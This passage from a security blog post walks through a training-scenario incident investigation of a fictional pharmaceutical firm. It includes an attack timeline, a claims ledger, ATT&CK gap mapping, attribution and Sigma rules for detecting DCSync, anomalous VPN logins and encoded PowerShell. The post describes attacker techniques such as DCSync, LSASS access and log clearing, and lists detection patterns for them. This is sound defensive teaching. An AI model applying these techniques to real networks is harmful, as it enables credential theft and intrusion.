Each file was individually accessed; timestamp modification suggests deliberate metadata manipulation.</li><li><strong>2024–11–06 02:14 — SERVER-RD-02<br></strong>EID 5156: outbound HTTPS from SERVER-RD-02 to external IP over port 443 during the file access window.<br><strong>Source:</strong> Windows Security + firewall<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1041<br><strong>Notes:</strong> Destination IP confirmed in Palo Alto NGFW log: 198.51.100.44; separate C2 from primary.</li><li><strong>2024–11–06 02:48 — DC01<br></strong>EID 4662: svc_backup requested DS-Replication-Get-Changes on DC01.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1003.006<br><strong>Notes:</strong> <strong>DCSync indicator.</strong> Pentest scope did not include DCSync. Pentest VLAN is 10.10.99.0/24; this event came from 10.10.3.22.</li><li><strong>2024–11–15 17:58 — Exchange<br></strong>Phishing email sent to m.cohen, the CFO: <strong>“Q4-2024 Licensing Agreement”</strong> with .xlsm attachment. SPF, DKIM, and DMARC all failed.<br><strong>Source:</strong> M365 Message Trace<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1566.001<br><strong>Notes:</strong> <strong>Second entry point — 24 days after the first.</strong></li><li><strong>2024–11–15 18:42 — WS-CFO-01<br></strong>Outlook spawned PowerShell with -NonI -W Hidden -Enc, downloading a second-stage payload from 203.0.113.87.<br><strong>Source:</strong> CrowdStrike + Sysmon EID 1<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1059.001<br><strong>Notes:</strong> <strong>Triggering alert.</strong></li><li><strong>2024–11–15 18:46–20:52 — WS-CFO-01<br></strong>LSASS memory access observed via Sysmon EID 10 with GrantedAccess 0x1010. Persistence added via Registry Run Key and scheduled task. BITS downloaded a second-stage binary.<br><strong>Source:</strong> Sysmon EID 10/11/13, EID 4698<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1003.001, T1547.001, T1053.005, T1197<br><strong>Notes:</strong> svchost32.exe dropped to AppData\\Roaming.</li><li><strong>2024–11–15 20:52 — SERVER-FIN-01<br></strong>WMI lateral movement observed: WmiPrvSE spawned PowerShell with -Enc and a different base64 payload.<br><strong>Source:</strong> CrowdStrike<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.003, T1059.001<br><strong>Notes:</strong> svc_finreport credentials used.</li><li><strong>2024–11–15 21:01 — SERVER-FIN-01<br></strong>Finance data staged: FR_2024_consolidated.zip created in C:\\Windows\\Temp\\.<br><strong>Source:</strong> CrowdStrike EID 11<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1039, T1560<br><strong>Notes:</strong> 2.8 MB upload confirmed in firewall logs at 21:14.</li><li><strong>2024–11–15 21:14 — WS-CFO-01<br></strong>wevtutil.exe cl Security executed, partially clearing the Windows Security log.<br><strong>Source:</strong> CrowdStrike<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1070.001<br><strong>Notes:</strong> Sysmon log remained intact because it was protected.</li></ol><p><strong>The evidence label system matters here.</strong> Event 12 (DCSync) is CONFIRMED — it exists in DC01’s Windows Security log, forwarded to Splunk, from an IP that is definitively WS-IT-LEVI and definitively not the pentest VLAN. That cannot be waved away as “possible pentest activity.” Event 6 (finance server access) is CORROBORATED — single source with incomplete log — and can only appear in the technical report with an explicit qualifier, not in the executive brief as a stated fact.</p><h4>3. Save and commit</h4><pre>git add 03-analysis/timeline/timeline.md<br>git commit -m "PROJ-2024-001: timeline — 18 events Oct 18–Nov 15, dual-path confirmed, GAP-001 bounds established"</pre><h3>Step R3: Claims Ledger — Every Assertion Traced to Evidence</h3><h4>1. Open the claims ledger</h4><pre>nano 03-analysis/claims/claims-ledger.md</pre><p>The template has a table with six columns: ID, Claim, Evidence, Confidence, Competing Hypotheses, PIR. Start with an empty row for each major assertion you identified in the timeline — then fill each one completely before moving to the next.</p><p><strong>For each row, answer these five questions before typing a word:</strong></p><ol><li>What is the exact assertion? (One sentence, falsifiable — could in principle be proven false)</li><li>Which file and line number is the evidence in? (Not “we saw in Splunk” — the actual log reference)</li><li>What confidence level and why? (High / Medium / Low / Insufficient — with explicit rationale)</li><li>What alternative explanations were considered — and why were they ruled out or left open?</li><li>Which PIR does this answer?</li></ol><p>If you cannot answer question 4, the claim is not ready to write. Think first.</p><h4>2. Fill in one claim per confirmed technique or PIR answer</h4><p>The claims ledger converts the timeline into auditable, falsifiable assertions. Each claim answers five questions: what, evidence, confidence, competing hypotheses, which PIR.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hBZhaHELHNyuzUeTbMbGvw.png"></figure><p><strong>CL-001 — Initial access via AiTM phishing against IT admin </strong><strong>p.levi</strong></p><ul><li><strong>Claim:</strong> Initial access was via AiTM phishing against IT admin p.levi on October 22, 2024.</li><li><strong>Evidence:</strong> M365 ATP log shows AiTM HTML lure delivered at 11:23 and opened at 11:31. VPN login from Istanbul occurred at 02:17 on October 24 with no MFA challenge, indicating likely stolen session token replay.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Credential purchase or insider activity cannot be fully ruled out without WS-IT-LEVI disk forensics, which is blocked by legal hold. However, the AiTM lure plus token replay pattern is more parsimonious.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-002 — Use of </strong><strong>svc_backup Domain Admin credentials to access formula files</strong></p><ul><li><strong>Claim:</strong> The adversary used svc_backup Domain Admin credentials to access SERVER-RD-02 and the formula files.</li><li><strong>Evidence:</strong> EID 4624 on SERVER-RD-02 shows svc_backup Type 3 logon from WS-IT-LEVI. EID 4663 occurred 47 times on formula files.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Legitimate backup operation is ruled out because backup jobs run from SERVER-WSUS-01 / 10.10.4.x, not from WS-IT-LEVI. The timestamp, 02:09 UTC, is outside the maintenance window.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-003 — Exfiltration of 47 formula files on November 6, 2024</strong></p><ul><li><strong>Claim:</strong> The 47 formula files in USPartner2024 were exfiltrated on November 6, 2024.</li><li><strong>Evidence:</strong> EID 4663 occurred 47 times, showing file access. EID 5156 shows outbound HTTPS from SERVER-RD-02 at the same time. Palo Alto NGFW flow shows 10.10.2.15 → 198.51.100.44:443, with 381 MB outbound between 02:14 and 02:19 UTC.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> File access for indexing or backup is ruled out because no backup job ran at this time. The 381 MB outbound volume matches the compressed formula package. The destination IP is not in the allowlist and resolves to a VPS hosting provider.</li><li><strong>PIR:</strong> PIR-001 — <strong>ANSWERED: YES</strong></li></ul><p><strong>CL-004 — DCSync executed via </strong><strong>svc_backup on November 6</strong></p><ul><li><strong>Claim:</strong> DCSync was executed via svc_backup Domain Admin rights on November 6 at 02:48 UTC.</li><li><strong>Evidence:</strong> DC01 EID 4662 shows DS-Replication-Get-Changes GUID from 10.10.3.22, which is WS-IT-LEVI. The subject username was svc_backup.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Legitimate AD replication is ruled out because the event originated from a workstation IP, not a domain controller. Authorized pentest scope explicitly excluded DCSync and used only 10.10.99.x IPs.</li><li><strong>PIR:</strong> PIR-003</li></ul><p><strong>CL-005 — CFO path and IT admin path are same threat actor</strong></p><ul><li><strong>Claim:</strong> Path A, involving the CFO on November 15, and Path B, involving the IT admin on October 22, are attributable to the same threat actor.</li><li><strong>Evidence:</strong> Both svchost32.exe and UpdateHelper.dll share the same fake PE compile timestamp: 2018-04-09. The secondary C2 sys-update-cdn[.]net was hard-coded in the CFO implant and also used in SERVER-RD-02 DNS activity.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> Coincidence would require two separate actors to target the same organization at the same time using a near-identical toolchain. This is extremely implausible.</li><li><strong>PIR:</strong> PIR-002</li></ul><p><strong>CL-006 — Full domain compromise via DCSync</strong></p><ul><li><strong>Claim:</strong> The adversary achieved full domain compromise via DCSync. All Active Directory credentials must be treated as compromised.</li><li><strong>Evidence:</strong> CL-004 confirms DCSync activity. svc_backup held Domain Admin rights. DCSync requests included krbtgt and privileged account hashes.</li><li><strong>Confidence:</strong> High</li><li><strong>Competing Hypotheses:</strong> DCSync may have been partial or failed, but this cannot be confirmed without full DC01 log access. Treating the environment as fully compromised is the conservative and operationally correct response until disproven.</li><li><strong>PIR:</strong> PIR-003</li></ul><p><strong>CL-003 is the pivotal claim.</strong> The US partner’s formulas are gone. That drives the PIR-001 answer and the entire notification timeline. CL-004 and CL-006 change the scope of remediation from “contain these three hosts” to “rotate all AD credentials, treat all 80 servers as potentially compromised.”</p><h4>3. Update project.yml PIR status</h4><p>When a PIR is answered, open project.yml and change the status field immediately:</p><pre>nano project.yml</pre><p>Change:</p><pre>- id: PIR-001<br>    status: open</pre><p>To:</p><pre>- id: PIR-001<br>    status: answered    # CL-003 — exfiltration confirmed, 381 MB, Nov 6</pre><h4>4. Commit the claims ledger</h4><pre>git add 03-analysis/claims/claims-ledger.md project.yml<br>git commit -m "PROJ-2024-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003 exfil confirmed); PIR-003 CONFIRMED ONGOING (CL-006 DCSync)"</pre><h3>Step R4: ATT&amp;CK Mapping — Where Detection Failed</h3><h4>1. Open the ATT&amp;CK mapping file</h4><pre>nano 03-analysis/attck-mapping/attck-mapping.md</pre><p>For each technique you identified in the timeline, add one row. The four columns that matter most operationally are: <strong>Confidence</strong> (how sure are you the technique was used), <strong>Rule Fired?</strong> (yes/no/partial — check your SIEM), and <strong>Gap Type</strong> (what kind of work is needed to close this detection hole).</p><p><strong>Gap types:</strong> Rule missing / Data source missing / Coverage incomplete / Architectural gap. Pick one. If you are unsure, write your best guess and flag it for SOC review.</p><p>Also update project.yml — fill the attck_techniques list:</p><pre>nano project.yml</pre><pre>scope:<br>  attck_techniques:<br>    - T1566.001<br>    - T1557<br>    - T1133<br>    - T1078.002<br>    - T1059.001<br>    - T1003.001<br>    - T1003.006<br>    - T1021.003<br>    - T1197<br>    - T1047<br>    - T1070.001<br>    - T1547.001</pre><h4>2. Fill one row per technique</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k61svPS7k5oRag9OCWIk4w.png"></figure><p><strong>T1566.001 — Phishing attachment, CFO </strong><strong>.xlsm</strong></p><ul><li><strong>Evidence:</strong> M365 ATP log</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> Partial — ATP delivered; SCL=4, threshold=5</li><li><strong>Gap Type:</strong> Coverage incomplete — SCL threshold tuning</li></ul><p><strong>T1557 — AiTM credential theft, IT admin</strong></p><ul><li><strong>Evidence:</strong> VPN login pattern + AiTM HTML lure</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — no AiTM session token detection</li></ul><p><strong>T1133 — VPN access with stolen credentials</strong></p><ul><li><strong>Evidence:</strong> VPN log: Istanbul, off-hours, no prior history</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — no anomalous VPN authentication alert</li></ul><p><strong>T1078.002 — Valid account abuse, </strong><strong>svc_backup</strong></p><ul><li><strong>Evidence:</strong> EID 4624, multiple events</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — service account off-hours logon undetected</li></ul><p><strong>T1059.001 — Encoded PowerShell, both hosts</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 1, CrowdStrike</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> Yes, CFO only, via CrowdStrike behavioral detection</li><li><strong>Gap Type:</strong> Coverage incomplete — CFO only; IT admin host fired no alert</li></ul><p><strong>T1003.001 — LSASS memory access</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 10, GrantedAccess 0x1010</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — Sysmon EID 10 not alerted on</li></ul><p><strong>T1003.006 — DCSync</strong></p><ul><li><strong>Evidence:</strong> DC01 EID 4662</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — EID 4662 audit configured but no alert rule</li></ul><p><strong>T1021.003 — WMI lateral movement to </strong><strong>SERVER-FIN-01</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike: WmiPrvSE → PowerShell</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — WmiPrvSE parent alert not deployed</li></ul><p><strong>T1197 — BITS download, second stage</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 1, bitsadmin</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — BITS external download not monitored</li></ul><p><strong>T1047 — WMI execution, lateral movement</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike log</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Data source missing — WMI logging not in SIEM</li></ul><p><strong>T1070.001 — Event log cleared</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike EID 1102</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — wevtutil alert not deployed</li></ul><p><strong>T1547.001 — Registry Run Key persistence</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 13</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Coverage incomplete — EID 13 ingested but no alert rule on AppData\\Roaming paths</li></ul><p><strong>The gap taxonomy tells the engineering team exactly what work is required:</strong></p><ul><li><strong>Rule missing (7 techniques):</strong> Data is in SIEM. A detection engineer can write and deploy the rule. These are sprint items.</li><li><strong>Coverage incomplete (3 techniques):</strong> Rule or data exists but is mis-tuned or partial. These require tuning, not new infrastructure.</li><li><strong>Data source missing (1 technique):</strong> WMI execution logging is not in the SIEM. This requires an infrastructure change before rules can be written.</li></ul><p>The DCSync gap (T1003.006) is particularly stark: the Advanced Audit Policy that generates EID 4662 was correctly configured on DC01, the event was forwarded to Splunk, and the event was visible in Splunk. There was no alert rule. A single Splunk search rule on source=WinEventLog:Security EventCode=4662 ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}" from a non-DC IP would have fired and contained this incident before the formula exfiltration.</p><h4>3. Commit the ATT&amp;CK mapping</h4><pre>git add 03-analysis/attck-mapping/attck-mapping.md project.yml<br>git commit -m "PROJ-2024-001: ATT&amp;CK mapping — 12 techniques, 7 rule-missing, 3 coverage-incomplete, 1 data-source-missing, 1 arch-gap"</pre><h3>Step R5: Attribution Assessment — Same Actor or Two?</h3><h4>1. Open the attribution file</h4><pre>nano 03-analysis/attribution/attribution.md</pre><p>Write attribution <strong>only after the claims ledger is complete</strong>. The attribution file has three sections: evidence for unification (or separation), confidence ladder scoring, and the exact language to use in deliverables. Fill them in that order.</p><p><strong>Do not start with a hypothesis.</strong> Start with the evidence you have from the claims ledger, then see where it points.</p><h4>2. Score the evidence against the confidence ladder</h4><p>The investigation faces a key analytical question: Path A (CFO phishing, November 15) and Path B (IT admin AiTM, October 22) — are they the same actor?</p><p><strong>Evidence for unification (same actor):</strong></p><ol><li><strong>Shared PE compile timestamp:</strong> Both dropped binaries — svchost32.exe (CFO host) and UpdateHelper.dll (IT admin host) — carry an identical fake compile timestamp of 2018-04-09. This is a known toolchain fingerprint. The probability of two unrelated actors both timestomping to the same date is extremely low.</li><li><strong>Shared secondary C2 domain in memory:</strong> Strings extracted from svchost32.exe include sys-update-cdn[.]net — the domain that appeared only in SERVER-RD-02's DNS logs during the formula exfiltration. The CFO's implant knew about infrastructure used during the Path B operation. This is only explicable if the same actor controlled both implants.</li><li><strong>Coordinated operations timeline:</strong> The CFO was targeted on the same day that the finance server data was being staged on SERVER-FIN-01 via lateral movement from the IT admin path. Two independent actors staging finance data simultaneously at the same target is implausible.</li></ol><p><strong>Assessment: Single threat actor, dual delivery mechanism.</strong></p><p>The actor compromised the IT admin first (October 22), used that access for data theft (November 6), then independently targeted the CFO to expand access to finance data. The two phishing lures used different delivery infrastructure (different sender domains, different sending IPs from the same /24 block) — consistent with an actor who maintains parallel operational tracks.</p><p><strong>Attribution confidence: Medium-High.</strong> Apply the confidence ladder from Step R5 of the methodology to score this case:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rrKN1yNFJL_eINzt_iec9A.png"></figure><p><strong>Ladder tier: Medium-High</strong> — TTP overlap + infrastructure match present; independent confirmation absent. The toolset has not been definitively matched to a named cluster, which prevents elevation to High.</p><p><strong>What to write:</strong> <em>“Activity assessed as a single threat actor based on shared toolchain indicators (PE timestamp, secondary C2 domain). Tradecraft and targeting profile are consistent with Iranian-nexus industrial espionage operations targeting Israeli pharmaceutical IP. Attribution to a named cluster is not warranted without CERT-IL deconfliction or independent confirmation. Confidence: Medium-High.”</em></p><h4>3. Paste the final language into attribution.md and commit</h4><pre>git add 03-analysis/attribution/attribution.md<br>git commit -m "PROJ-2024-001: attribution — single actor, Medium-High confidence, shared PE timestamp + secondary C2, Iranian-nexus tradecraft consistent"</pre><h3>Step R6: Detection Rules — Four That Would Have Changed the Outcome</h3><h4>1. Create one file per rule</h4><p>Each rule gets its own file in 04-detections/sigma/:</p><pre>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-001-anomalous-vpn-auth.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-002-dcsync-non-dc.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-003-svc-account-offhours.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-004-wmiprvse-powershell.yml</pre><p>Open the first one:</p><pre>nano 04-detections/sigma/DET-001-anomalous-vpn-auth.yml</pre><p>Every rule must reference the CL-ID it would have detected and the gap type it closes. That is how the detection backlog stays traceable to the investigation.</p><h4>2. Fill each rule</h4><p>Each rule is written with a reference to the claim it would have detected and the evidence gap it closes.</p><p><strong>DET-001: Anomalous VPN Authentication from Non-Corporate Source</strong></p><pre>title: Anomalous VPN Authentication — New Geography or Hosting ASN<br>id: a1b2c3d4-5678-9abc-def0-1234567890ab<br>status: experimental<br>description: &gt;<br>  Detects VPN authentication success from a source IP with no prior history for<br>  this user, specifically from IPs geolocated outside Israel or from hosting/VPN<br>  ASNs. Covers T1133 and T1557 (session token replay after AiTM interception).<br>  Derived from PROJ-001 — CL-001, p.levi VPN from Istanbul at 02:17 UTC.<br>logsource:<br>  category: network<br>  product: cisco_anyconnect<br>detection:<br>  selection:<br>    event.action: vpn_auth_success<br>    user.name|exists: true<br>  filter_known:<br>    source.geo.country_iso_code: 'IL'<br>    source.as.number|not|startswith: ['AS47583', 'AS16276']   # hosting VPS ASNs<br>  condition: selection and not filter_known<br>falsepositives:<br>  - Legitimate international travel — validate against HR travel records<br>  - Remote contractors working abroad<br>level: high<br>tags:<br>  - attack.initial_access<br>  - attack.t1133<br>  - attack.credential_access<br>  - attack.t1557</pre><p><strong>DET-002: DCSync Attack Detection</strong></p><pre>title: DCSync Attack via Non-DC Account<br>id: b2c3d4e5-6789-abcd-ef01-234567890abc<br>status: production<br>description: &gt;<br>  Detects DCSync by looking for EID 4662 with the DS-Replication-Get-Changes<br>  GUID originating from a workstation IP rather than a domain controller.<br>  Derived from PROJ-001 — CL-004: svc_backup performed DCSync from WS-IT-LEVI<br>  using Domain Admin rights that were never revoked after an August 2024 <br>  emergency backup restoration.<br>logsource:<br>  category: windows<br>  product: windows<br>  service: security<br>detection:<br>  selection:<br>    EventID: 4662<br>    ObjectType: '{19195a5b-6da0-11d0-afd3-00c04fd930c9}'   # DS-Replication-Get-Changes<br>    Properties|contains:<br>      - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'             # DS-Replication-Get-Changes-All<br>      - '89e95b76-444d-4c62-991a-0facbeda640c'             # DS-Replication-Get-Changes-In-Filtered-Set<br>  filter_legitimate_dc:<br>    IpAddress|startswith:<br>      - '10.10.1.10'   # DC01 — add all DC IPs here<br>      - '10.10.1.11'   # DC02<br>  condition: selection and not filter_legitimate_dc<br>falsepositives:<br>  - Azure AD Connect sync account — must be explicitly whitelisted<br>  - Authorized red team / pentest — validate scope before dismissing<br>level: critical<br>tags:<br>  - attack.credential_access<br>  - attack.t1003.006</pre><p><strong>DET-003: Service Account Off-Hours Authentication</strong></p><pre>title: Service Account Authentication Outside Business Hours<br>id: c3d4e5f6-789a-bcde-f012-34567890abcd<br>status: experimental<br>description: &gt;<br>  Detects authentication by a service account (accounts matching svc_* naming<br>  pattern) outside business hours (22:00–06:00) to a non-designated system.<br>  Covers T1078.002 (Valid Accounts: Domain Accounts) for svc_backup lateral<br>  movement in PROJ-001.<br>logsource:<br>  category: windows<br>  product: windows<br>  service: security<br>detection:<br>  selection:<br>    EventID: 4624<br>    LogonType: 3<br>    SubjectUserName|startswith: 'svc_'<br>  filter_business_hours:<br>    TimeCreated|windash|lt: '22:00:00'<br>    TimeCreated|windash|gt: '06:00:00'<br>  filter_known_backup_host:<br>    IpAddress: '10.10.4.15'   # SERVER-WSUS-01 — legitimate backup source<br>  condition: selection and not filter_business_hours and not filter_known_backup_host<br>falsepositives:<br>  - Scheduled tasks that legitimately run at night — review and whitelist specific pairs<br>level: medium<br>tags:<br>  - attack.lateral_movement<br>  - attack.t1078.002</pre><p><strong>DET-004: WmiPrvSE Spawning PowerShell</strong></p><pre>title: WMI Remote Execution — PowerShell Child of WmiPrvSE<br>id: d4e5f6a7-89ab-cdef-0123-4567890abcde<br>status: production<br>description: &gt;<br>  Detects WMI-based lateral movement (T1021.003) where WmiPrvSE.exe spawns<br>  PowerShell on a remote system. This is the pattern from PROJ-001 step 16:<br>  lateral movement from WS-CFO-01 to SERVER-FIN-01 via WMI using svc_finreport<br>  credentials. CrowdStrike detected the PowerShell on SERVER-FIN-01 but the<br>  originating WMI connection from the CFO host had no coverage.<br>logsource:<br>  category: process_creation<br>  product: windows<br>detection:<br>  selection:<br>    ParentImage|endswith: '\WmiPrvSE.exe'<br>    Image|endswith: '\powershell.exe'<br>  suspicious_flags:<br>    CommandLine|contains:<br>      - '-Enc'<br>      - '-EncodedCommand'<br>      - '-NonI'<br>      - '-W Hidden'<br>  condition: selection and suspicious_flags<br>falsepositives:<br>  - SCCM WMI-based software deployment with PowerShell post-install scripts<br>level: high<br>tags:<br>  - attack.lateral_movement<br>  - attack.execution<br>  - attack.t1021.003<br>  - attack.t1059.001</pre><p><strong>Validation:</strong> All four rules were validated against the PROJ-001 evidence set using Hayabusa before deployment. DET-001 fires on the October 24 Istanbul VPN login. DET-002 fires on the November 6 DCSync event. DET-003 fires on every svc_backup off-hours logon. DET-004 fires on the SERVER-FIN-01 WMI execution.</p><h4>3. Validate each rule against your evidence set</h4><pre># Run Hayabusa against the collected logs to confirm rules fire on known-bad events<br>hayabusa csv-timeline -d 01-evidence/ -r 04-detections/sigma/ -o validation-results.csv</pre><p>Review the output. A rule that does not fire on its own evidence set should not be deployed.</p><h4>4. Update project.yml deliverables count and commit</h4><pre>nano project.yml</pre><pre>deliverables:<br>  - type: sigma-rules<br>    count: 4<br>    status: complete</pre><pre>git add 04-detections/sigma/ project.yml<br>git commit -m "PROJ-2024-001: detections — DET-001 to DET-004 written and validated PASS against evidence set via Hayabusa"</pre><h3>Step R7: Deliverables — What Each Stakeholder Gets</h3><h4>1. Open the deliverable templates</h4><pre>nano 05-deliverables/executive-brief.md<br>nano 05-deliverables/soc-handoff.md</pre><p>The executive brief answers three questions only: what happened, what was confirmed stolen or compromised, and what must happen in the next 24 hours. One page. No technical jargon. Every PIR that is answered gets a one-line answer at the top.</p><p>The SOC handoff lists: current IOCs (with confidence ratings), detection rules deployed, hunting queries still open, and escalation criteria. The SOC receives this, not the executive brief.</p><blockquote>2. Fill the executive brief</blockquote><p><strong>Executive brief (1 page, TLP:AMBER) — what the CISO needs in 90 minutes:</strong></p><blockquote><em>An adversary assessed as Iranian-nexus compromised LifeTech Pharma through two separate phishing attacks over 24 days. Using stolen IT administrator credentials, they accessed and exfiltrated the 47-file US licensing formula package on November 6, 2024. They also performed a DCSync attack on the domain controller, which means all Active Directory credentials must be treated as compromised.</em></blockquote><blockquote><strong><em>PIR-001 ANSWERED:</em></strong><em> The US partner formula package was exfiltrated. 381 MB outbound confirmed in firewall logs.</em></blockquote><blockquote><strong><em>PIR-003 ANSWERED:</em></strong><em> Active compromise ongoing. The CFO alert on November 15 is a second wave from the same actor, still active at time of investigation.</em></blockquote><blockquote><strong><em>Immediate actions:</em></strong><em> Full AD credential rotation; quarantine WS-CFO-01 and SERVER-FIN-01; notify INCD (72h clock from discovery: expires November 17 02:14 IST); brief the US licensing partner.</em></blockquote><p><strong>SOC handoff (technical):</strong></p><p>Current IOCs: 203.0.113.87, 198.51.100.44, telemetry-cdn-services[.]biz, sys-update-cdn[.]net, uslifepartner-group[.]com, lifetechpharma-corp[.]eu.</p><p>Four detection rules deployed (DET-001 through DET-004). Two hunting queries: (1) pivot on C2 domains across all 838 endpoints — the 3 confirmed hosts may not be all; (2) hunt for any svc_backup authentication from non-WSUS IPs in the past 30 days.</p><h4>3. Update project.yml status to closed and commit everything</h4><pre>nano project.yml</pre><pre>project:<br>  status: closed<br>pirs:<br>  - id: PIR-001<br>    status: answered    # CL-003<br>  - id: PIR-002<br>    status: answered    # CL-001<br>  - id: PIR-003<br>    status: answered    # CL-006 - ongoing, AD rotation required</pre><pre>git add 05-deliverables/ project.yml<br>git commit -m "PROJ-2024-001: deliverables — executive brief, SOC handoff, INCD notification ready; all PIRs answered; project closed"</pre><h3>The Git History: What a Completed Investigation Looks Like</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9m5xzm1v4yUoNN47GznubQ.png"></figure><pre>b9a2f1c  PROJ-001: deliverables — executive brief, SOC handoff, INCD notification ready<br>7c8d3e4  PROJ-001: detections — DET-001 through DET-004 validated PASS via Hayabusa<br>5f2a9b1  PROJ-001: attribution — single actor assessed (shared PE timestamp + secondary C2)<br>3e4c7d8  PROJ-001: ATT&amp;CK mapping — 12 techniques, 7 rule-missing, 3 incomplete, 1 data-missing<br>1b6f2a5  PROJ-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003); PIR-003 CONFIRMED ONGOING (CL-006)<br>9a3e7c2  PROJ-001: timeline — 18 events Oct 22–Nov 15; dual-path confirmed, same actor assessed<br>6f1b4d9  PROJ-001: evidence inventory — 6 sources, GAP-001 documented, firewall log retrieval urgent<br>2c8a5e3  PROJ-001: scope — signed off 22:55 IST; PIR-001/002/003, TLP AMBER, legal hold WS-IT-LEVI<br>a1d7f4b  PROJ-001: intake — CFO PowerShell alert, legal hold WS-IT-LEVI, formula data in scope<br>0e9c2b7  PROJ-001: scaffold initialized</pre><p>Each commit is a phase. Each message states the project ID, the phase, and a one-line summary of what was concluded. When a lawyer asks six months from now “what did you know and when did you know it?” — the git log answers.</p><h3>Key Lessons</h3><p><strong>The alert was not the beginning.</strong> The SOC received its first signal 52 hours after the breach was already in progress — and 15 days after the formula files were gone. The triggering alert was the second entry point. A detection rule on anomalous VPN authentication (DET-001) would have fired on October 24 at 02:17 UTC — before any lateral movement, before any data access.</p><p><strong>Gaps are findings, not absences.</strong> The 10-day Sysmon gap on WS-IT-LEVI coincided exactly with the delivery of a phishing email. Stopping a logging service is T1562.001 — Impair Defenses. A gap is not “we don’t know what happened.” A gap that coincides with a malicious delivery is evidence of anti-forensics.</p><p><strong>DCSync changes everything.</strong> The scope of remediation is not “three infected hosts.” When DCSync is confirmed via Domain Admin rights, every credential in the AD is potentially compromised. The scope is all 80 servers. The IR Lead needs to know this before the 90-minute CISO brief, not after.</p><p><strong>Claims need competing hypotheses.</strong> CL-003 (exfiltration confirmed) is only defensible as “high confidence” because specific alternative explanations were checked and explicitly ruled out — scheduled backup (wrong source IP, wrong timing), authorized developer activity (no jobs scheduled). Without the competing hypothesis analysis, a claim is an assertion. With it, it is analysis.</p><p><em>This scenario is training assignment A01 from the </em><a href="https://github.com/anpa1200/CTI_as_a_Code"><em>CTI as a Code repository</em></a><em>. The full evidence set, template, and worked solution are available there.</em></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><p><strong>Andrey Pautov</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3e6574b7b85f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f">CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma</a> was originally published in <a 